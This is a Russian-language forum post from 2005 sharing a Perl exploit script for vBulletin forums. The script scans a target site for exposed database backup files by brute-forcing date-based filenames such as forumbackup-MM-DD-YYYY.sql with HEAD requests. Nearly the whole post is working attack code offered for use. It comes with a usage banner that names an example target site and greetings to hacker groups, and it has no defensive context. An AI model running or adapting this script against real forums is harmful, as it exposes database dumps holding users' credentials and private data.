27.09.2005, 12:49
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022
Репутация:
26
|
|
Exploit Vbulletin 3.0.8 (backup.php) in perl 
Код:
#!/usr/bin/perl
###########################################
# C R O U Z . C O M S E C U R I T Y T E A M #
###########################################
# EXPLOIT FOR: vBULLETIN All Versions Forums Backup Detector #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Vuln Credited By M@FIA From Crouz Security Team #
# #
# Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html #
# #
###########################################
#GR33tz T0 => mh_p0rtal -- Dr-ChephaleX -- The-CepheXin -- Djay_Agoustinno #
# Autumn_Love6 -- Behzad185 -- No_Face_King -- M@FIA # #
# #
# IRANIAN HACKERS AND RESEARCHERS #
# Special Lamerz : Shabgard & Emperor (Two Arabic Lamerz) #
# #
###########################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n===========================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <Target> <DIR>\n\n";
print "===========================\n\n";
print "Examples:\n\n";
print " VbulletinBU.pl www.shabgard.org /Forums/\n\n";
print "You Can Add The Forum Backup Folder \n(It's Default in Forum's Root Directory) \n Example : VbulletinBU.pl www.shabgard.org /Forums/include/ /Alpha Programmer\n\n";
exit();
}
my $host = $ARGV[0];
my $DIR = $ARGV[1];
@Alpha = ('0' , '1' , '2' , '3' , '4' ,'5' , '6' , '7' , '8' , '9' );
foreach $licht0 ( @Alpha ) {
foreach $licht1 ( @Alpha ) {
foreach $licht2 ( @Alpha ) {
foreach $licht3 ( @Alpha ) {
foreach $licht4 ( @Alpha ) {
$crouz = $licht1.$licht2;
$crouz2 = $licht3.$licht4;
$crouz3 = "200";
$crouz3 .= $licht0;
if ($crouz >= 31 ) {
goto LightDoor;
}
if ($crouz2 > 12 ) {
goto LightDoor;
}
if ($crouz3 > 2005 ) {
goto LightDoor;
}
print "forumbackup-$crouz-$crouz2-$crouz3.sql\n";
$Sirius = "forumbackup-$crouz2-$crouz-$crouz3.sql";
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
$http = "HEAD $DIR$Sirius HTTP/1.0\n";
$http .= "Host: $host\n\r\n\r";
print "\n";
print $remote $http;
sleep(1);
while ($sirus=<$remote>)
{
if($sirus =~ "200 OK") {
print "$sirus";
print "Nice ... You Found The BackUp Of VBulletin Forum , See This URL :\n";
print "$host$DIR$Sirius\n\n";
goto start;
}
}
}
LightDoor:
}
}
}
}
start:
#EoF
enjOY néM3S!s
Последний раз редактировалось néM3S!s; 27.09.2005 в 12:54..
|
|
|